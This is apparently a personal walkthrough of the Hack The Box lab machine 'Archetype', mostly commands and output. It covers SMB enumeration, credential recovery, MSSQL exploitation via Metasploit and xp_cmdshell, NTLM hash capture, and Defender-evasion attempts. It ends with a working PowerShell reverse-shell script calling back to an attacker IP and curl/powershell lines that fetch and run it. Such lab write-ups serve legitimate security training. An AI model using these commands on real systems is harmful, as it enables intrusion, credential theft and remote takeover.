# Hack The Box - Archetype
* https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server

## Scanning
* `nmap -sV -sC -sT 10.10.10.27`
```
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-07-07T03:54:37
|_Not valid after:  2051-07-07T03:54:37
|_ssl-date: 2021-07-07T04:35:01+00:00; +23m29s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h47m29s, deviation: 3h07m50s, median: 23m28s
| ms-sql-info: 
|   10.10.10.27:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-06T21:34:52-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-07T04:34:55
|_  start_date: N/A
```
* `nmap --script vuln -sV 10.10.10.27`
```
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.27
Host is up (0.040s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000
|_sslv2-drown: 
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
```
* `smbclient -L //10.10.10.27 -N`
    * ADMIN$
    * backups
    * C$
    * IPC$

## Attack Vectors
* Services
    * MSRCP (135)
    * Netbios (139)
    * Microsoft DS (445) - Windows Server 2019 Standard 17763
    * MS SQL (1433) - Microsoft SQL Server 2017 14.00.1000.00 RTM
* Nmap script vuln
    * Possible MS08-067
* CVE details
    * Possible CVE-2018-8273 for MSSQL
        * Nothing with Searchsploit
        * No exploit found on the internet
* SMB Shares

## Exploitation
* SMB Shares
    * `smbclient //10.10.10.27/backups -N`
        * File : `prod.dtsConfig`
        * Downloaded it
    ```
    <DTSConfiguration>
        <DTSConfigurationHeading>
            <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
        </DTSConfigurationHeading>
        <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
            <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
        </Configuration>
    </DTSConfiguration>
    ```
* Credentials found on SMB Share:
    * `M3g4c0rp123`
    * `ARCHETYPE\sql_svc`
    * Looks like SQL Native CLI credentials
* Metasploit `auxiliary/admin/mssql/mssql_enum`
    * `set domain ARCHETYPE`
    * `set use_windows_authent true`
    * `set verbose true`
    * Works!
        ```
        [*]     Microsoft SQL Server 2017 (RTM) - 14.0.1000.169 (X64) 
        [*]             Aug 22 2017 17:04:49 
        [*]             Copyright (C) 2017 Microsoft Corporation
        [*]             Standard Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
        [*] 10.10.10.27:1433 - Configuration Parameters:
        [*] 10.10.10.27:1433 -  C2 Audit Mode is Not Enabled
        [*] 10.10.10.27:1433 -  xp_cmdshell is Enabled
        [*] 10.10.10.27:1433 -  remote access is Enabled
        [*] 10.10.10.27:1433 -  allow updates is Not Enabled
        [*] 10.10.10.27:1433 -  Database Mail XPs is Not Enabled
        [*] 10.10.10.27:1433 -  Ole Automation Procedures are Not Enabled
        [*] 10.10.10.27:1433 - Databases on the server:
        [*] 10.10.10.27:1433 -  Database name:master
        [*] 10.10.10.27:1433 -  Database Files for master:
        [*] 10.10.10.27:1433 -          C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\master.mdf
        [*] 10.10.10.27:1433 -          C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\mastlog.ldf
        [*] 10.10.10.27:1433 -  Database name:tempdb
        [*] 10.10.10.27:1433 -  Database Files for tempdb:
        [*] 10.10.10.27:1433 -          C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\tempdb.mdf
        [*] 10.10.10.27:1433 -          C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\templog.ldf
        [*] 10.10.10.27:1433 -          C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\tempdb_mssql_2.ndf
        [*] 10.10.10.27:1433 -  Database name:model
        [*] 10.10.10.27:1433 -  Database Files for model:
        [*] 10.10.10.27:1433 -          C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\model.mdf
        [*] 10.10.10.27:1433 -          C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\modellog.ldf
        [*] 10.10.10.27:1433 -  Database name:msdb
        [*] 10.10.10.27:1433 -  Database Files for msdb:
        [*] 10.10.10.27:1433 -          C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\MSDBData.mdf
        [*] 10.10.10.27:1433 -          C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\MSDBLog.ldf
        [*] 10.10.10.27:1433 - System Logins on this Server:
        [*] 10.10.10.27:1433 -  sa
        [*] 10.10.10.27:1433 -  ##MS_SQLResourceSigningCertificate##
        [*] 10.10.10.27:1433 -  ##MS_SQLReplicationSigningCertificate##
        [*] 10.10.10.27:1433 -  ##MS_SQLAuthenticatorCertificate##
        [*] 10.10.10.27:1433 -  ##MS_PolicySigningCertificate##
        [*] 10.10.10.27:1433 -  ##MS_SmoExtendedSigningCertificate##
        [*] 10.10.10.27:1433 -  ##MS_PolicyEventProcessingLogin##
        [*] 10.10.10.27:1433 -  ##MS_PolicyTsqlExecutionLogin##
        [*] 10.10.10.27:1433 -  ##MS_AgentSigningCertificate##
        [*] 10.10.10.27:1433 -  ARCHETYPE\sql_svc
        [*] 10.10.10.27:1433 -  NT SERVICE\SQLWriter
        [*] 10.10.10.27:1433 -  NT SERVICE\Winmgmt
        [*] 10.10.10.27:1433 -  NT SERVICE\MSSQLSERVER
        [*] 10.10.10.27:1433 -  NT AUTHORITY\SYSTEM
        [*] 10.10.10.27:1433 -  NT SERVICE\SQLSERVERAGENT
        [*] 10.10.10.27:1433 -  NT SERVICE\SQLTELEMETRY
        [*] 10.10.10.27:1433 - Disabled Accounts:
        [*] 10.10.10.27:1433 -  sa
        [*] 10.10.10.27:1433 -  ##MS_PolicyEventProcessingLogin##
        [*] 10.10.10.27:1433 -  ##MS_PolicyTsqlExecutionLogin##
        [*] 10.10.10.27:1433 - No Accounts Policy is set for:
        [*] 10.10.10.27:1433 -  All System Accounts have the Windows Account Policy Applied to them.
        [*] 10.10.10.27:1433 - Password Expiration is not checked for:
        [*] 10.10.10.27:1433 -  sa
        [*] 10.10.10.27:1433 -  ##MS_PolicyEventProcessingLogin##
        [*] 10.10.10.27:1433 -  ##MS_PolicyTsqlExecutionLogin##
        [*] 10.10.10.27:1433 - System Admin Logins on this Server:
        [*] 10.10.10.27:1433 -  sa
        [*] 10.10.10.27:1433 -  ARCHETYPE\sql_svc
        [*] 10.10.10.27:1433 -  NT SERVICE\SQLWriter
        [*] 10.10.10.27:1433 -  NT SERVICE\Winmgmt
        [*] 10.10.10.27:1433 -  NT SERVICE\MSSQLSERVER
        [*] 10.10.10.27:1433 -  NT SERVICE\SQLSERVERAGENT
        [*] 10.10.10.27:1433 - Windows Logins on this Server:
        [*] 10.10.10.27:1433 -  ARCHETYPE\sql_svc
        [*] 10.10.10.27:1433 -  NT SERVICE\SQLWriter
        [*] 10.10.10.27:1433 -  NT SERVICE\Winmgmt
        [*] 10.10.10.27:1433 -  NT SERVICE\MSSQLSERVER
        [*] 10.10.10.27:1433 -  NT AUTHORITY\SYSTEM
        [*] 10.10.10.27:1433 -  NT SERVICE\SQLSERVERAGENT
        [*] 10.10.10.27:1433 -  NT SERVICE\SQLTELEMETRY
        [*] 10.10.10.27:1433 - Windows Groups that can logins on this Server:
        [*] 10.10.10.27:1433 -  No Windows Groups where found with permission to login to system.
        [*] 10.10.10.27:1433 - Accounts with Username and Password being the same:
        [*] 10.10.10.27:1433 -  No Account with its password being the same as its username was found.
        [*] 10.10.10.27:1433 - Accounts with empty password:
        [*] 10.10.10.27:1433 -  No Accounts with empty passwords where found.
        [*] 10.10.10.27:1433 - Stored Procedures with Public Execute Permission found:
        [*] 10.10.10.27:1433 -  sp_replsetsyncstatus
        [*] 10.10.10.27:1433 -  sp_replcounters
        [*] 10.10.10.27:1433 -  sp_replsendtoqueue
        [*] 10.10.10.27:1433 -  sp_resyncexecutesql
        [*] 10.10.10.27:1433 -  sp_prepexecrpc
        [*] 10.10.10.27:1433 -  sp_repltrans
        [*] 10.10.10.27:1433 -  sp_xml_preparedocument
        [*] 10.10.10.27:1433 -  xp_qv
        [*] 10.10.10.27:1433 -  xp_getnetname
        [*] 10.10.10.27:1433 -  sp_releaseschemalock
        [*] 10.10.10.27:1433 -  sp_refreshview
        [*] 10.10.10.27:1433 -  sp_replcmds
        [*] 10.10.10.27:1433 -  sp_unprepare
        [*] 10.10.10.27:1433 -  sp_resyncprepare
        [*] 10.10.10.27:1433 -  sp_createorphan
        [*] 10.10.10.27:1433 -  xp_dirtree
        [*] 10.10.10.27:1433 -  sp_replwritetovarbin
        [*] 10.10.10.27:1433 -  sp_replsetoriginator
        [*] 10.10.10.27:1433 -  sp_xml_removedocument
        [*] 10.10.10.27:1433 -  sp_repldone
        [*] 10.10.10.27:1433 -  sp_reset_connection
        [*] 10.10.10.27:1433 -  xp_fileexist
        [*] 10.10.10.27:1433 -  xp_fixeddrives
        [*] 10.10.10.27:1433 -  sp_getschemalock
        [*] 10.10.10.27:1433 -  sp_prepexec
        [*] 10.10.10.27:1433 -  xp_revokelogin
        [*] 10.10.10.27:1433 -  sp_execute_external_script
        [*] 10.10.10.27:1433 -  sp_resyncuniquetable
        [*] 10.10.10.27:1433 -  sp_replflush
        [*] 10.10.10.27:1433 -  sp_resyncexecute
        [*] 10.10.10.27:1433 -  xp_grantlogin
        [*] 10.10.10.27:1433 -  sp_droporphans
        [*] 10.10.10.27:1433 -  xp_regread
        [*] 10.10.10.27:1433 -  sp_getbindtoken
        [*] 10.10.10.27:1433 -  sp_replincrementlsn
        [*] 10.10.10.27:1433 - Instances found on this server:
        [*] 10.10.10.27:1433 -  MSSQLSERVER
        [*] 10.10.10.27:1433 - Default Server Instance SQL Server Service is running under the privilege of:
        [*] 10.10.10.27:1433 -  .\sql_svc
        ```
* Metasploit `exploit/windows/mssql/mssql_payload`
    * `set domain ARCHETYPE`
    * `set use_windows_authent true`
    * `set verbose true`
    * `set username sql_svc`
    * `set password M3g4c0rp123`
    * Exploit worked but no session? Retry? Wrong payload maybe?
        * Default payload : `windows/meterpreter/reverse_tcp`
    * `set payload windows/meterpreter/reverse_http`
    * Got a Meterpreter that is crashed .. 
* `exploit/windows/mssql/mssql_payload`
    * Windows Defendre blocks it
* `crackmapexec mssql -d ARCHETYPE -u sql_svc -p M3g4c0rp123 -x "whoami" 10.10.10.27`
    * `archetype\sql_svc`
* `mssqlclient.py  -db volume -windows-auth ARCHETYPE/sql_svc:M3g4c0rp123@10.10.10.27`
* `crackmapexec mssql 10.10.10.27 -d ARCHETYPE -u sql_svc -p 'M3g4c0rp123' -q "SHOW Databases;"`
    * It works
* Need to start here and get a shell or else
* `crackmapexec mssql 10.10.10.27 -d ARCHETYPE -u sql_svc -p 'M3g4c0rp123' -q "SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE'"`
    * Nothing interesting
* Back to Metasploit `exploit/windows/mssql/mssql_payload`
    * `set domain ARCHETYPE`
    * `set use_windows_authent true`
    * `set verbose true`
    * `set username sql_svc`
    * `set password M3g4c0rp123`
* Windows Defender blocks it
    * Need to obfuscate or encrypt the payload
    * Tried HTTPS instead of TCP
        ```
        [*] 10.10.10.27:1433 - Command Stager progress - 100.00% done (102246/102246 bytes)
        [!] https://10.10.16.12:8181 handling request from 10.10.10.27; (UUID: g8nyotva) Without a database connected that payload UUID tracking will not work!
        [*] https://10.10.16.12:8181 handling request from 10.10.10.27; (UUID: g8nyotva) Staging x86 payload (176220 bytes) ...
        [!] https://10.10.16.12:8181 handling request from 10.10.10.27; (UUID: g8nyotva) Without a database connected that payload UUID tracking will not work!
        ```
* Impacket mssqlclient seem to be the solution here
* After installing the lastest release
* `/home/patate/.local/bin/mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@10.10.10.27 -windows-auth`
    * Works!
    * https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server
    * `select @@version`
        ```
        Microsoft SQL Server 2017 (RTM) - 14.0.1000.169 (X64) 
        Aug 22 2017 17:04:49 
        Copyright (C) 2017 Microsoft Corporation
        Standard Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
        ```
    * `enable_xp_cmdshell`
    * `xp_cmdshell whoami /all`
        * BUILTIN\Users 
        * NT AUTHORITY\SERVICE 
        * NT SERVICE\MSSQLSERVER 
        * CONSOLE LOGON 
        * NT AUTHORITY\Authenticated Users 
        * NT AUTHORITY\This Organization 
        * NT AUTHORITY\Local account 
        * LOCAL
        * NT AUTHORITY\NTLM Authentication 
    * Add a user : `xp_cmdshell ‘net user potatoman /ADD’`
        * Access denied
        * Did not try : 
            * Add to admins : `xp_cmdshell ‘net localgroup Administrators potatoman /ADD’`
            * Disable firewall : `xp_cmdshell ‘netsh firewall set opmode disable’`
    * `EXEC master..xp_cmdshell 'whoami'`
        * Works
    * `SELECT name FROM master.dbo.sysdatabases` (Get databases)
    * `SELECT * FROM master.INFORMATION_SCHEMA.TABLES;` (Get tables in database)
        * master
            * spt_fallback_db
            * spt_fallback_dev
            * spt_fallback_usg
            * spt_values
            * spt_monitor
            * MSreplication_options
        * tempdb
            * empty
        * model
            * empty
        * msdb
            * lots of tables
    * `select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;` (List users)
        * `b'02003d1be73b4e8454e737ed6b68096e53a810f2ff98dc50df96a240f5b560aebdafcbf6c2db0cab31ad1b1f2af285b3659a6d5479de875380b8100a34882ad7748438985cae'`
        * `b'0200b21fd125bfc51840773537c9389ba510dddede01db01a45dbea30a74cb34a3b84fb7fa54c60d7f5c7e71813f50182f6ad974c7ab3cd077ca1bea8e1e65979b6d9e1cb223'`
        * `b'0200100bac9600580c3c299ed7ff81d77bcbe50b830ca60306d7a5e5bf34a5c6be0d895247952bfff5708764033a797e8ca4f2004797203d7ee5c794d655c3218a0b13a3ce63'`
    * `xp_cmdshell "dir C:\Users\"`
        * `Administrator`
        * `Public`
        * `sql_svc`
    * `xp_cmdshell "dir C:\Users\sql_svc\Desktop"` 
        * `user.txt`
    * `xp_cmdshell "more C:\Users\sql_svc\Desktop\user.txt"`
        * FLAG 1 = `3e7b102e78218e935bf3f4951fec21a3`

## Privilege Escalation
* Metasploit : `auxiliary/admin/mssql/mssql_ntlm_stealer`
    * `set username sql_svc`
    * `set DOMAIN ARCHETYPE`
    * `set use_windows_authent true`
    * `set password M3g4c0rp123`
    * `set smbproxy 10.10.16.12`
* Also start responder to capture NTLM hash
    * `sudo responder -I tun0 -rdw -vv`
* Hash captured : 
    * `sql_svc::ARCHETYPE:b8ae25ad6c7440d9:2CE08B5B5A8D658C46FC8FBC9F9EE70E:01010000000000000079E73E6473D7010E08FC9E844712200000000002000800460048004300410001001E00570049004E002D005000510056005600350058005400340056005900330004003400570049004E002D00500051005600560035005800540034005600590033002E0046004800430041002E004C004F00430041004C000300140046004800430041002E004C004F00430041004C000500140046004800430041002E004C004F00430041004C00070008000079E73E6473D701060004000200000008003000300000000000000000000000003000004F1A5A3E20C829D28E2BF87BED9D807E7D6EB132CDCE68CAC8F7549D2FDC0DDC0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0031003200000000000000000000000000`
    * That would be the password we already have tho
* `auxiliary/admin/mssql/mssql_escalate_execute_as`
    * `sql_svc has the sysadmin role, no escalation required.`
* `auxiliary/admin/mssql/mssql_escalate_dbowner`
    * `sql_svc has the sysadmin role, no escalation required.`
* `auxiliary/admin/mssql/mssql_exec`
    * Works but what to do from here?
* `use exploit/windows/mssql/mssql_payload`
    * This does not work
* Log back in with mssqlclient
    * `EXEC sp_configure 'Show Advanced Options', 1;`
    * `reconfigure;`
    * `EXEC sp_configure 'xp_cmdshell', 1`
    * `reconfigure;`
    * `xp_cmdshell "whoami"`
* Create a powershell payload and make it available
    ```
    $client = New-Object System.Net.Sockets.TCPClient("10.10.16.12",443);$stream =
    $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =
    $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName
    System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 |
    Out-String );$sendback2 = $sendback + "# ";$sendbyte =
    ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyt
    e.Length);$stream.Flush()};$client.Close()
    ```
    * `python3 -m http.server 80`
* Start a MSF handler
* In SQL : `xp_cmdshell "curl http://10.10.16.12/shell.ps1 -o C:\Users\sql_svc\Desktop\zzzshell.ps1"`
* In SQL : `xp_cmdshell "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command 'C:\Users\sql_svc\Desktop\zzzshell.ps1'"
`







